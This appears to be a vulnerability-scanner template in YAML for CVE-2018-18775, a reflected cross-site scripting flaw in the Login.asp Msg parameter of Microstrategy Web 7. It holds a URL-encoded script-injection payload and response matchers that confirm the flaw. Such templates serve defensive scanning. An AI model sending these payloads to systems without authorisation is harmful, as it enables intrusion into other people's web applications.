30 lines
877 B
YAML
30 lines
877 B
YAML
id: CVE-2018-18775
|
|
|
|
info:
|
|
name: Cross Site Scripting in Microstrategy Web version 7
|
|
author: 0x_Akoko
|
|
description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter
|
|
severity: medium
|
|
tags: microstrategy,xss
|
|
reference: https://www.exploit-db.com/exploits/45755
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C'
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- '"><script>alert(/{{randstr}}/);</script>'
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|